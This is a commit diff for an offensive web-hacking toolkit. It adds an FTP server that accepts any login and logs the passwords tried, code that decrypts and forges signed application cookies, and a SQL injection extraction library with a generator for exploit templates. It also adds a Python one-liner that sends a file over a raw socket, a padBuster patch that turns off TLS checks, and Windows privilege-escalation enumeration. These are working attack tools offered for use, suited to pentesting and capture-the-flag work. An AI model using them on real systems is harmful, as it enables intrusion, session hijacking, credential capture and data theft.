Exploit template enhancement

README.md

@@ -57,6 +57,7 @@ Can be deployed on victim machines to scan the intranet.
 - dnsserver.py: Create a temporary dns server responding dynamically to basic DNS requests (in-memory)
 - sshserver.py: Create a temporary ssh server to intercept credentials (TODO: relay) (in-memory)
 - smtpserver.py: Create a temporary smtp server (in-memory)
+- ftpserver.py: Create a temporary ftp server (in-memory, thanks to [@benzammour](https://github.com/benzammour))
 - template.py: Creates a template for web exploits, similar to pwnlib's template
 - pcap_file_extract.py: Lists and extracts files from http connections found in pcap files
 - find_git_commit.py: Compares a local repository (e.g. downloaded from a remote server) with another git repository to guess the commit hash. Useful to find used versions

crypto_cookie.py

@@ -0,0 +1,148 @@
+import base64
+import hashlib
+import hmac
+import json
+import os
+import re
+import urllib.parse
+from Crypto.Cipher import AES
+
+def unpad(data):
+    if not data:
+        return data
+    last_byte = data[-1]
+    if last_byte < AES.block_size:
+        data = data[0:-last_byte]
+    return data
+
+def pad(data):
+    if not data:
+        return data
+    padding = AES.block_size - (len(data) % AES.block_size)
+    if padding < AES.block_size:
+        data = data + bytes([padding]) * padding
+    return data
+
+def generate_mac(APP_KEY, iv, data):
+    return hmac.new(key=APP_KEY, msg=base64.b64encode(iv)+base64.b64encode(data), digestmod=hashlib.sha256)
+
+def decrypt_cookie(APP_KEY, cookie):
+    json_obj = json.loads(base64.b64decode(urllib.parse.unquote(cookie)).decode())
+    iv = base64.b64decode(json_obj["iv"].encode())
+    encrypted = base64.b64decode(json_obj["value"].encode())
+    mac = generate_mac(APP_KEY, iv, encrypted)
+    if mac.hexdigest() != json_obj["mac"]:
+        print("[~] WARN: macs are not equal")
+
+    cipher = AES.new(APP_KEY, AES.MODE_CBC, iv)
+    return unpad(cipher.decrypt(encrypted)).decode()
+
+def create_cookie(APP_KEY, data):
+    iv = os.urandom(AES.block_size)
+    cipher = AES.new(APP_KEY, AES.MODE_CBC, iv)
+    encrypted = cipher.encrypt(pad(json.dumps(data).encode()))
+    mac = generate_mac(APP_KEY, iv, encrypted)
+
+    json_obj = {
+        "iv": base64.b64encode(iv).decode(),
+        "value": base64.b64encode(encrypted).decode(),
+        "mac": mac.hexdigest()
+    }
+
+    new_cookie = base64.b64encode(json.dumps(json_obj).encode()).decode()
+    # new_cookie = urllib.parse.quote(new_cookie)
+    return new_cookie
+
+def hkdf_extract(salt, input_key_material, hash_name='sha256'):
+    """
+    Extract a pseudorandom key from the input key material and salt using HMAC.
+
+    :param salt: The salt (bytes).
+    :param input_key_material: The input key material (bytes).
+    :param hash_name: The hash function to use (string).
+    :return: The pseudorandom key (bytes).
+    """
+    if salt is None or len(salt) == 0:
+        salt = b'\x00' * hashlib.new(hash_name).digest_size
+
+    return hmac.new(salt, input_key_material, hash_name).digest()
+
+def hkdf_expand(pseudorandom_key, info=b'', length=32, hash_name='sha256'):
+    """
+    Expand the pseudorandom key into one or more keys using HMAC.
+
+    :param pseudorandom_key: The pseudorandom key (bytes).
+    :param info: Optional context and application-specific information (bytes).
+    :param length: The length of the output key material in bytes (int).
+    :param hash_name: The hash function to use (string).
+    :return: The output key material (bytes).
+    """
+    hash_len = hashlib.new(hash_name).digest_size
+    blocks_needed = (length + hash_len - 1) // hash_len
+    okm = b''
+    output_block = b''
+
+    for counter in range(blocks_needed):
+        output_block = hmac.new(pseudorandom_key, output_block + info + bytes([counter + 1]), hash_name).digest()
+        okm += output_block
+
+    return okm[:length]
+
+def hkdf(input_key_material, salt, info=b'', length=32, hash_name='sha256'):
+    """
+    Derive keys using HKDF (extract and expand stages).
+
+    :param input_key_material: The input key material (bytes).
+    :param salt: The salt (bytes).
+    :param info: Optional context and application-specific information (bytes).
+    :param length: The length of the output key material in bytes (int).
+    :param hash_name: The hash function to use (string).
+    :return: The derived key (bytes).
+    """
+    pseudorandom_key = hkdf_extract(salt, input_key_material, hash_name)
+    return hkdf_expand(pseudorandom_key, info, length, hash_name)
+
+def decrypt_cookie_prestashop(COOKIE_KEY, cookie):
+    assert re.match(r"^[a-fA-F0-9]+$", COOKIE_KEY)
+    assert re.match(r"^[a-fA-F0-9]+$", cookie)
+
+    # https://github.com/defuse/php-encryption/blob/master/src/Key.php
+    KEY_CURRENT_VERSION = b"\xDE\xF0\x00\x00"
+    HEADER_SIZE = len(KEY_CURRENT_VERSION)
+    KEY_BYTE_SIZE = 32
+    CHECKSUM_BYTE_SIZE = 32
+    COOKIE_KEY = bytearray.fromhex(COOKIE_KEY)
+    assert COOKIE_KEY.startswith(KEY_CURRENT_VERSION)
+    assert len(COOKIE_KEY) == HEADER_SIZE + KEY_BYTE_SIZE + CHECKSUM_BYTE_SIZE
+    real_cookie_key = COOKIE_KEY[HEADER_SIZE:HEADER_SIZE+KEY_BYTE_SIZE]
+    cookie_signature_check = COOKIE_KEY[0:HEADER_SIZE+KEY_BYTE_SIZE]
+    key_signature = COOKIE_KEY[HEADER_SIZE+KEY_BYTE_SIZE:]
+    assert hashlib.sha256(cookie_signature_check).digest() == key_signature
+
+    # https://github.com/defuse/php-encryption/blob/master/src/Core.php
+    CURRENT_VERSION = b"\xDE\xF5\x02\x00"
+    HEADER_SIZE = len(CURRENT_VERSION)
+    SALT_SIZE = 32
+    IV_SIZE = 16
+    HMAC_SIZE = 32
+    cookie = bytearray.fromhex(cookie)
+    assert cookie.startswith(CURRENT_VERSION)
+    assert len(cookie) >= HEADER_SIZE + SALT_SIZE + IV_SIZE + HMAC_SIZE
+    salt = cookie[HEADER_SIZE:HEADER_SIZE+SALT_SIZE]
+    iv = cookie[HEADER_SIZE+SALT_SIZE:HEADER_SIZE+SALT_SIZE+IV_SIZE]
+    ct = cookie[HEADER_SIZE+SALT_SIZE+IV_SIZE:-HMAC_SIZE]
+    hmac_data = cookie[-HMAC_SIZE:]
+
+    PBKDF2_ITERATIONS = 100000
+    ENCRYPTION_INFO_STRING = b'DefusePHP|V2|KeyForEncryption'
+    AUTHENTICATION_INFO_STRING = b'DefusePHP|V2|KeyForAuthentication'
+
+    derived_key = hkdf(real_cookie_key, salt, ENCRYPTION_INFO_STRING, 32, "sha256")
+
+    cipher = AES.new(derived_key, AES.MODE_CTR, initial_value=iv, nonce=b"")
+    plaintext = cipher.decrypt(ct).decode()
+
+    # TODO: check hmac_data
+
+    lines = plaintext.split("¤")
+    return dict(map(lambda line: line.split("|"), lines))

fileserver.py

@@ -285,8 +285,8 @@ if __name__ == "__main__":
     parser = argparse.ArgumentParser(description="Spawn a temporary http server")
     parser.add_argument(
         "action",
-        choices=["shell", "dump", "proxy", "xss"],
+        choices=["shell", "dump", "proxy", "xss", "start"],
-        help="Choose one of these actions: shell, dump, proxy, xss"
+        help="Choose one of these actions: shell, dump, proxy, xss, start"
     )
 
     parser.add_argument(
@@ -297,7 +297,6 @@ if __name__ == "__main__":
         help="Address to bind on (default: 0.0.0.0)"
     )
 
-    # Optionales Argument: port
     parser.add_argument(
         "--port",
         type=int,
@@ -337,5 +336,9 @@ if __name__ == "__main__":
         file_server.dumpRequest("/exfiltrate")
         print("Exfiltrate data using:")
         print(xss)
+    elif args.action == "start":
+        file_server.load_directory(".")
+        print("Serve files in current directory using:")
+        print(file_server.get_full_url("/", ip_addr=ip_address))
 
     file_server.serve_forever()

ftpserver.py

@@ -0,0 +1,181 @@
+import os
+import logging
+import argparse
+import signal
+from pyftpdlib.handlers import FTPHandler
+from pyftpdlib.servers import ThreadedFTPServer
+from pyftpdlib.authorizers import DummyAuthorizer
+
+logger = logging.getLogger()
+logger.setLevel(logging.INFO)
+
+stream_handler = logging.StreamHandler()
+stream_handler.setLevel(logging.INFO)
+
+formatter = logging.Formatter("%(asctime)s - %(message)s")
+stream_handler.setFormatter(formatter)
+
+logger.addHandler(stream_handler)
+
+MSG_LOGIN = "Login successful"
+MSG_CLOSE = "Goodbye"
+
+
+# Class to log every action the user takes
+class CustomFTPHandler(FTPHandler):
+    def on_login(self, username):
+        logging.info(f"User '{username}' logged in successfully.")
+
+    def on_login_failed(self, username, password):
+        logging.warning(
+            f"Failed login attempt for user '{username}' with password '{password}'."
+        )
+
+    def on_file_received(self, file):
+        logging.info(f"File received: {file}")
+
+    def on_file_sent(self, file):
+        logging.info(f"File sent: {file}")
+
+    def on_file_deleted(self, file):
+        logging.info(f"File deleted: {file}")
+
+    def on_file_renamed(self, old_file, new_file):
+        logging.info(f"File renamed from '{old_file}' to '{new_file}'")
+
+    def on_file_downloaded(self, file):
+        logging.info(f"File downloaded: {file}")
+
+    def on_file_stored(self, file):
+        logging.info(f"File stored: {file}")
+
+    def on_file_retrieved(self, file):
+        logging.info(f"File retrieved: {file}")
+
+    def on_file_aborted(self, file):
+        logging.info(f"File transfer aborted: {file}")
+
+    def on_file_changed(self, file):
+        logging.info(f"File changed: {file}")
+
+    def on_file_moved(self, old_file, new_file):
+        logging.info(f"File moved from '{old_file}' to '{new_file}'")
+
+    def on_file_uploaded(self, file):
+        logging.info(f"File uploaded: {file}")
+
+    def on_connect(self):
+        logger.info(f"Client connected: {self.remote_ip}")
+
+    def on_disconnect(self):
+        logger.info(f"Client disconnected: {self.remote_ip}")
+
+    def on_logout(self, username):
+        logger.info(f"User logged out: {username}")
+
+    def on_incomplete_file_received(self, file):
+        logger.warning(f"Incomplete file received: {file}")
+
+    def on_incomplete_file_sent(self, file):
+        logger.warning(f"Incomplete file received: {file}")
+
+
+class AnyUserAuthorizer(DummyAuthorizer):
+    """
+    Authorization class that allows any combination of username/password.
+    """
+
+    def __init__(self, directory):
+        DummyAuthorizer.__init__(self)
+        self.directory = directory
+        self.default_params = {
+            "pwd": "",
+            "home": self.directory,
+            "perm": "elr",
+            "operms": {},
+            "msg_login": MSG_LOGIN,
+            "msg_quit": MSG_CLOSE,
+        }
+
+    def validate_authentication(self, username, password, handler):
+        logger.info(f"User '{username}' tried logging in with password: '{password}'")
+
+        return True
+
+    def get_home_dir(self, username):
+        return self.directory
+
+    def has_user(self, username):
+        if username in self.user_table:
+            return True
+
+        self.add_user(username, "", self.directory)
+        return True
+
+    def has_perm(self, username, perm, path=None) -> bool:
+        if username not in self.user_table:
+            # add user manually and not via add_user due to infinite recursion
+            self.user_table[username] = self.default_params
+
+        return True
+
+    def get_msg_login(self, username: str) -> str:
+        return MSG_LOGIN
+
+    def get_msg_quit(self, username: str) -> str:
+        return MSG_CLOSE
+
+
+class FastFTPServer:
+    def __init__(self, directory, port):
+        self.directory = directory
+        self.port = port
+        self.server = None
+
+    def start(self):
+        authorizer = AnyUserAuthorizer(directory=self.directory)
+
+        handler = CustomFTPHandler
+        handler.authorizer = authorizer
+
+        self.server = ThreadedFTPServer(("", self.port), handler)
+        logging.info(f"Starting FTP server on port {self.port}")
+
+        self.server.serve_forever()
+
+    def cleanup(self):
+        logging.info("Shutting down FTP server...")
+        if self.server:
+            self.server.close_all()
+        logging.info("FTP server shut down.")
+
+
+def signal_handler(sig, frame):
+    logging.info("Received Ctrl+C, shutting down...")
+    ftp_server.cleanup()
+    exit(0)
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Temporary FTP Server")
+    parser.add_argument(
+        "--dir", "-d", type=str, default=".", help="Directory to serve files from"
+    )
+    parser.add_argument(
+        "--port", "-p", type=int, default=21, help="Port to run the FTP server on"
+    )
+
+    args = parser.parse_args()
+
+    if not os.path.exists(args.dir):
+        print(f"Error: The directory '{args.dir}' does not exist.")
+        return
+
+    global ftp_server
+    ftp_server = FastFTPServer(args.dir, args.port)
+    signal.signal(signal.SIGINT, signal_handler)
+    ftp_server.start()
+
+
+if __name__ == "__main__":
+    main()

git-dumper.py

@@ -292,9 +292,14 @@ class FindObjectsWorker(DownloadWorker):
         with open(abspath, 'wb') as f:
             f.write(response.content)
 
-        # parse object file to find other objects
+        try:
-        obj_file = dulwich.objects.ShaFile.from_path(abspath)
+            # parse object file to find other objects
-        return get_referenced_sha1(obj_file)
+            obj_file = dulwich.objects.ShaFile.from_path(abspath)
+            return get_referenced_sha1(obj_file)
+        except:
+            print("[-] Error parsing:", filepath)
+            os.remove(abspath)
+            return []
 
 
 def fetch_git(url, directory, jobs, retry, timeout, follow_redirects, module=".git"):
@@ -525,7 +530,7 @@ if __name__ == '__main__':
                                      description='Dump a git repository from a website.')
     parser.add_argument('url', metavar='URL',
                         help='url')
-    parser.add_argument('directory', metavar='DIR',
+    parser.add_argument('--directory', metavar='DIR', default=None, type=str,
                         help='output directory')
     parser.add_argument('--proxy',
                         help='use the specified proxy')
@@ -572,6 +577,13 @@ if __name__ == '__main__':
             parser.error('invalid proxy')
 
     # output directory
+    if args.directory is None:
+        parsed_url = urllib.parse.urlparse(args.url)
+        if not parsed_url or not parsed_url.hostname:
+            parser.error('no output directory given and cannot derive from URL')
+        else:
+            args.directory = parsed_url.hostname
+
     if not os.path.exists(args.directory):
         os.makedirs(args.directory)
 

padBuster.pl

@@ -642,7 +642,8 @@ sub makeRequest {
   $lwp = LWP::UserAgent->new(env_proxy => 1,
                             keep_alive => 1,
                             timeout => 30,
-			    requests_redirectable => [],
+			    			requests_redirectable => [],
+							ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 },
                             );
 
   $req = new HTTP::Request $method => $url;

sqli.py

@@ -5,11 +5,14 @@ import string
 class SQLi(ABC):
 
     @staticmethod
-    def build_query(column: str, table=None, condition=None, offset=None):
+    def build_query(column: str|list, table=None, condition=None, offset=None, limit=1):
-        condition = "" if not condition else f" WHERE {condition}"
+        query = "SELECT "
-        offset = "" if offset is None else f" OFFSET {offset}"
+        query += column if isinstance(column, str) else ",".join(column)
-        table = "" if not table else f" FROM {table}"
+        query += "" if not table else f" FROM {table}"
-        return f"SELECT {column}{table}{condition} LIMIT 1{offset}"
+        query += "" if not condition else f" WHERE {condition}"
+        query += "" if limit is None else f" LIMIT {limit}"
+        query += "" if offset is None or limit is None else f" OFFSET {offset}"
+        return query
 
     def extract_multiple_ints(self, column: str, table=None, condition=None, verbose=False):
         row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
@@ -33,9 +36,11 @@ class SQLi(ABC):
 
         return rows
 
-    @abstractmethod
+    def substring(self, what, offset: int, size: int):
-    def ascii(self):
+        return f"substr({what},{offset},{size})"
-        pass
+
+    def ascii(self, what):
+        return f"ascii({what})"
 
     @abstractmethod
     def extract_int(self, column: str, table=None, condition=None, 
@@ -76,10 +81,9 @@ class ReflectedSQLi(SQLi, ABC):
         pass
 
     def extract_int(self, column: str, table=None, condition=None, offset=None, verbose=False):
-        query_columns = [column] + list(map(str, range(2, len(self.column_types) + 1)))
+        return int(self.extract_string(column, table, condition, offset))
-        return int(self.reflected_sqli(query_columns, table, condition, offset)[0])
 
-    def extract_string(self, column: str, table=None, condition=None, offset=None, verbose=False):
+    def extract_string(self, column: list|str, table=None, condition=None, offset=None, verbose=False):
         if str not in self.column_types:
             print("[!] Reflectd SQL does not reflect string types, only:", self.column_types)
             return None
@@ -137,12 +141,13 @@ class ReflectedSQLi(SQLi, ABC):
             query_columns[offset] = column
             offset += 1
 
+        column_str = ",".join(query_columns) 
+        # todo: fix count(*) for distinct
         row_count = self.extract_int(f"COUNT(*)", table=table, condition=condition, verbose=verbose)
         if verbose:
             print(f"Fetching {row_count} rows")
 
         rows = []
-        column_str = ",".join(query_columns)
         for i in range(0, row_count):
             row = self.reflected_sqli(query_columns, table, condition, i, verbose=verbose)
             if one:
@@ -152,6 +157,25 @@ class ReflectedSQLi(SQLi, ABC):
 
         return rows
 
+    @classmethod
+    def guess_reflected_columns(cls, callback):
+        data = None
+        column_count = 1
+        while data is None:
+            query_columns = list(map(lambda c: f"'column-{c}-sqli'", range(column_count)))
+            query_str = cls.build_query(query_columns)
+            data = callback(query_str) # should return some kind of text for a given query
+            if not data:
+                column_count += 1
+                continue
+
+        reflected_columns = []
+        for c in range(column_count):
+            column_name = f"'column-{c}-sqli'"
+            reflected_columns.append(str if column_name in data else None) # how to guess the type (str/int)?
+
+        return reflected_columns
+
     # todo: extract_multiple with columns as dict (name -> type), e.g. extract_multiple({"id": int, "name": str})
 
 class BlindSQLi(SQLi, ABC):
@@ -205,7 +229,7 @@ class BlindSQLi(SQLi, ABC):
         cur_str = ""
         while True:
             found = False
-            cur_column = self.ascii() + f"(substr({column},{len(cur_str) + 1},1))"
+            cur_column = self.ascii(self.substring(column, len(cur_str) + 1, 1))
             if charset:
                 query = self.build_query(cur_column, table, condition, offset)
                 for c in charset:
@@ -233,7 +257,6 @@ class BlindSQLi(SQLi, ABC):
 
         return cur_str
 
-
 class PostgreSQLi(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("VERSION()", verbose=verbose)
@@ -253,9 +276,6 @@ class PostgreSQLi(SQLi, ABC):
                                              f"table_schema='{schema}' AND table_name='{table}'",
                                              verbose=verbose)
 
-    def ascii(self):
-        return "ascii"
-
 class MySQLi(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("VERSION()", verbose=verbose)
@@ -275,10 +295,6 @@ class MySQLi(SQLi, ABC):
                                              f"table_schema='{schema}' AND table_name='{table}'",
                                              verbose=verbose)
 
-    def ascii(self):
-        return "ascii"
-
-
 class SQLitei(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("sqlite_version()", verbose=verbose)
@@ -297,5 +313,5 @@ class SQLitei(SQLi, ABC):
         # TODO: we could query the "sql" column and parse it using regex
         raise Exception("Not implemented!")
 
-    def ascii(self):
+    def ascii(self, what):
-        return "unicode"
+        return f"unicode({what})"

subdomainFuzz.sh

@@ -14,13 +14,19 @@ fi
 
 DOMAIN=$(echo $DOMAIN | sed -e 's|^[^/]*//||' -e 's|/.*$||')
 
-
+if [ $# -lt 2 ]; then
-echo "[ ] Resolving IP-Address…"
+  echo "[ ] Resolving IP-Address…"
-output=$(resolveip $DOMAIN 2>&1)
+  output=$(resolveip $DOMAIN 2>&1)
-status=$(echo $?)
+  status=$(echo $?)
-if ! [[ $status == 0 ]] ; then
+  if ! [[ $status == 0 ]] ; then
-  echo "[-] ${output}"
+    echo "[-] ${output}"
-  exit
+    exit
+  fi
+  IP_ADDRESS=$(echo $output | head -n 1 |  awk '{print $NF}')
+  echo "[+] IP-Address: ${IP_ADDRESS}"
+else
+  IP_ADDRESS=$2
+  echo "[+] Using IP-Address: ${IP_ADDRESS}"
 fi
 
 function sni () {
@@ -37,17 +43,15 @@ function sni () {
   echo $sni
 }
 
-IP_ADDRESS=$(echo $output | head -n 1 |  awk '{print $NF}')
-echo "[+] IP-Address: ${IP_ADDRESS}"
 echo "[ ] Retrieving default site…"
 rnd=$(uuidgen)
 sni=$(sni ${PROTOCOL} ${rnd}.${DOMAIN})
-charcountDomain=$(curl -s "${PROTOCOL}://${DOMAIN}" -k -m 5 | wc -m)
 charcountIpAddress=$(curl -s "${PROTOCOL}://${IP_ADDRESS}" -k -m 5 | wc -m)
 charcountNonExistent=$(curl -s "${PROTOCOL}://${rnd}.${DOMAIN}" --resolve "${sni}:${IP_ADDRESS}" -k -m 5 | wc -m)
+charcountDomain=$(curl -s "${PROTOCOL}://${DOMAIN}" -k -m 5 | wc -m)
 echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
 echo "[ ] Fuzzing…"
 
 (set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
   -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
-  -u "${PROTOCOL}://${DOMAIN}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")
+  -u "${PROTOCOL}://${DOMAIN}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")

template.py

@@ -1,18 +1,40 @@
 #!/usr/bin/env python
 
+import re
 import sys
 import json
+import argparse
 import urllib.parse
 
 def generate_template(base_url, features):
 
+    # we could all need that
+    imports = [
+        "os", "io", "re", "sys",
+        "json", "time", "base64", "requests",
+        "subprocess", "urllib.parse"
+    ]
+
+    partial_imports = {
+        "bs4": ["BeautifulSoup"],
+        "hackingscripts": ["util", "rev_shell"],
+        "urllib3.exceptions": ["InsecureRequestWarning"]
+    }
+
+    main_code = []
+    methods = []
+    ip_address_arg = next(filter(lambda f: re.match(r"ip_address=(.*)", f), features), None)
+    ip_address = "util.get_address()" if not ip_address_arg else "'" + ip_address_arg[1] + "'"
+
     variables = {
-        "IP_ADDRESS": "util.get_address()", 
+        "IP_ADDRESS": ip_address, 
-        "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"',
+        "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
-        "PROXIES": json.dumps({"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"})
     }
     
-    if "proxies" in features or "burp" in features:
+    proxy_arg = next(filter(lambda f: re.match(r"proxy=(.*)", f), features), None)
+    if proxy_arg or "burp" in features:
+        proxy_url = "http://127.0.0.1:8080" if not proxy_arg else proxy_arg[1]
+        variables["PROXIES"] = json.dumps({"http": proxy_url, "https": proxy_url})
         proxy = """
     if \"proxies\" not in kwargs:
         kwargs[\"proxies\"] = PROXIES
@@ -29,8 +51,8 @@ def generate_template(base_url, features):
     else:
         vhost_param = ""
         full_url = "BASE_URL + uri"
-
+        
-    request_method = f"""def request(method, uri{vhost_param}, **kwargs):
+    methods.insert(0, f"""def request(method, uri{vhost_param}, **kwargs):
     if not uri.startswith("/") and uri != "":
         uri = "/" + uri
 
@@ -47,25 +69,12 @@ def generate_template(base_url, features):
     {proxy}
     url = {full_url}
     return client.request(method, url, **kwargs)
-"""
-
-    methods = [request_method]
-
-    if "login" in features or "account" in features:
-        variables["USERNAME"] = '"Blindhero"'
-        variables["PASSWORD"] = '"test1234"'
-        methods.append("""
-def login(username, password):
-    session = requests.Session()
-    res = request("POST", "/login", data={"username": username, "password": password}, session=session)
-    if res.status_code != 200:
-        print("[-] Error logging in")
-        exit()
-    
-    return session
 """)
 
     if "register" in features or "account" in features:
+        main_code.append("""if not register(USERNAME, PASSWORD):
+        exit(1)
+""")
         variables["USERNAME"] = '"Blindhero"'
         variables["PASSWORD"] = '"test1234"'
         methods.append("""
@@ -78,11 +87,71 @@ def register(username, password):
     return True
 """)
 
-    main = """
+    if "login" in features or "account" in features:
+        main_code.append("""session = login(USERNAME, PASSWORD)
+    if not session:
+        exit(1)
+""")
+        variables["USERNAME"] = '"username"'
+        variables["PASSWORD"] = '"password"'
+        methods.append("""
+def login(username, password):
+    session = requests.Session()
+    res = request("POST", "/login", data={"username": username, "password": password}, session=session)
+    if res.status_code != 200:
+        print("[-] Error logging in")
+        exit()
+    
+    return session
+""")
+
+    if "sqli" in features:
+        partial_imports["hackingscripts.sqli"] = ["MySQLi", "PostgreSQLi", "BlindSQLi", "ReflectedSQLi"]
+        methods.append("""
+class ReflectedSQLiPoC(MySQLi, ReflectedSQLi):
+    def __init__(self):
+        # TODO: specify reflected columns with their types
+        super().__init__([None, str, int])
+    def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
+        # TODO: build query and extract columns from response
+        return None
+""")
+        methods.append("""
+class BlindSQLiPoC(MySQLi, BlindSQLi):
+    def blind_sqli(self, condition: str, verbose=False) -> bool:
+        # TODO: build query and evaluate condition
+        return False
+""")
+
+        main_code.append("""poc = ReflectedSQLiPoC()
+    print(poc.get_current_user())  
+""")
+
+    if "http-server" in features or "file-server" in features:
+        partial_imports["hackingscripts.fileserver"] = ["HttpFileServer"]
+        main_code.append("""file_server = HttpFileServer("0.0.0.0", 3000)
+    file_server.enableLogging()
+    file_server.addRoute("/dynamic", on_request)
+    file_server.addFile("/static", b"static-content")
+    file_server.startBackground()
+""")
+
+        methods.append("""
+def on_request(req):
+    # TODO: auto generated method stub
+    return 200, b"", { "X-Custom-Header": "1" }     
+""")
+
+    if len(main_code) == 0:
+        main_code = ["pass"]
+
+    main = f"""
 if __name__ == "__main__":
-    pass
+    {'\n    '.join(main_code)}
 """
 
+    imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
+    imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
     variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
     header = f"""#!/usr/bin/env python
 
@@ -91,21 +160,7 @@ if __name__ == "__main__":
 # For more information, visit: https://git.romanh.de/Roman/HackingScripts
 # 
 
-import os
+{imports}
-import io
-import re
-import sys
-import json
-import time
-import base64
-import requests
-import subprocess
-import urllib.parse
-from bs4 import BeautifulSoup
-from hackingscripts import util, rev_shell
-from hackingscripts.fileserver import HttpFileServer
-from hackingscripts.sqli import MySQLi, PostgreSQLi, BlindSQLi, ReflectedSQLi
-from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
 {variables}
@@ -116,14 +171,38 @@ requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
 if __name__ == "__main__":
 
-    if len(sys.argv) < 2:
+    parser = argparse.ArgumentParser(
-        print("Usage: %s <URL> [features]" % sys.argv[0])
+        description="Exploit Template for web attacks",
-        exit()
+        formatter_class=argparse.RawTextHelpFormatter
+    )
 
-    url = sys.argv[1]
+    available_features = [
+        "ip_address=[...]: Local IP-Address for reverse connections",
+        "burp|proxy=[...]: Tunnel traffic through a given proxy or Burp defaults",
+        "subdomain|vhost: Allow to specify a subdomain for outgoing requests",
+        "register|account: Generate an account registration method stub",
+        "login|account: Generate an account login method stub",
+        "sqli: Generate an template SQL-Injection class",
+        "http-server|file-server: Generate code for starting an in-memory http server"
+    ]
+
+    parser.add_argument("url", type=str, help="Target URL")
+    parser.add_argument(
+        "-f",
+        "--features",
+        nargs="*",
+        type=str,
+        default=[],
+        help="Optional list of features:\n- " + "\n- ".join(available_features)
+    )
+
+    args = parser.parse_args()
+
+    url = args.url
     if "://" not in url:
         url = "http://" + url
 
-    features = [] if len(sys.argv) < 3 else sys.argv[2].split(",")
+    features = args.features
     template = generate_template(url, features)
     print(template)
+

update.sh

@@ -52,13 +52,13 @@ download https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py
 
 echo ""
 echo "Updating LinPEAS + WinPEAS…"
-peas_version=$(get_latest_version carlospolop/PEASS-ng)
+peas_version=$(get_latest_version peass-ng/PEASS-ng)
 if [ ! -z "$peas_version" ]; then
   echo "Got PEAS version: $peas_version"
-  download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/linpeas.sh linpeas.sh
+  download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/linpeas.sh linpeas.sh
-  download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/winPEASx86.exe win/winPEAS.exe
+  download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEASx86.exe win/winPEAS.exe
-  download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/winPEASx64.exe win/winPEASx64.exe
+  download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEASx64.exe win/winPEASx64.exe
-  download https://github.com/carlospolop/PEASS-ng/releases/download/$peas_version/winPEAS.bat win/winPEAS.bat
+  download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEAS.bat win/winPEAS.bat
 else
   echo "Unable to determine latest PEAS version"
 fi

upload_file.py

@@ -46,6 +46,7 @@ if __name__ == "__main__":
 
     print("[+] Now listening, download file using:")
     print('nc %s %d > %s' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
+    print('python -c \'import socket;sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0);sock.connect(("%s",%d));sock.sendall(open("%s","rb").read())\'' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
     print()
 
     serve_file(listen_sock, path, forever=True)

util.py

@@ -135,6 +135,9 @@ def assert_json_path(res, path, value, err=None):
 
     json_data = json.loads(res.text)
     for key in filter(None, path.split(".")):
+        match = re.match(r"\[([0-9]+)\]", key)
+        if match:
+            key = int(match[1])
         json_data = json_data[key]
 
     if json_data == value:

win/winPEAS.bat

@@ -63,63 +63,68 @@ ECHO.
 CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
 ECHO.   [i] Check for vulnerabilities for the OS version with the applied patches
-ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
+ECHO.   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits
 systeminfo
 ECHO.
 CALL :T_Progress 2
 
 :ListHotFixes
-wmic qfe get Caption,Description,HotFixID,InstalledOn | more
+where wmic >nul 2>&1
+if %errorlevel% equ 0 (
+    wmic qfe get Caption,Description,HotFixID,InstalledOn | more
+) else (
+    powershell -command "Get-HotFix | Format-Table -AutoSize"
+)
 set expl=no
 for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes)
 IF "%expl%" == "yes" ECHO.   [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL
+IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn 2>nul | findstr /C:"KB2592799" 1>NUL
 IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys)
-IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL
